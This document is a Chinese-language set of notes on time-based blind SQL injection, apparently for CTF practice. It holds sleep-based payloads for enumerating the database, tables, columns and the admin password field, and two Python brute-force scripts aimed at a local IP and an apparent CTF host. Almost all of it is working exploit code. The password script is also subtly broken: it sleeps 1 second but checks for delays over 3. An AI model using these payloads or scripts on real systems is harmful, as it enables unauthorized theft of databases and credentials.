盲注

一、语句

测试语句：

if(ascii(mid(1,1,1))like(49),sleep(3),1)

1、表：

if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database()))),1,1))like(97),sleep(30),1)

2、列：

if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(0x61646d696e))),1,1))like(105),sleep(30),1)

3、字段

if(ascii(mid((select(group_concat(password))from(admin)),1,1))like(55),sleep(30),1)

二、爆破数据库脚本

import requests
from time import sleep

url = "http://192.168.8.148/sql.php?id="

for i in range(1, 100):
	for j in range(32, 128):
		payload = "if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)"

		res = requests.get(url+payload)

		if res.elapsed.total_seconds() > 3:
			print(chr(j), end='')
			break


'''
数据库
if(ascii(mid((select(database()))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)


表名
if(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(database())))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)

字段名
if(ascii(mid((select(group_concat(column_name))from(information_schema.columns)where((table_name)like(\"test_sql\")))," + str(i) + ",1))like(" + str(j) + "),sleep(3),1)

'''

三、跑密码的脚本

import requests
from time import sleep

url = "http://ctf1-1.anfu.hillstonenet.com:8081/single.php?id="



for i in range(1, 33):
   for j in range(47, 128):
       if(47<j<58 or 96<j<123):
           d = "if(ascii(mid((select(group_concat(password))from(admin))," + str(i) + ",1))like(" + str(j) + "),sleep(1),1)"
           r = requests.get(url + d)
           if r.elapsed.total_seconds() > 3:
               print(chr(j))
               break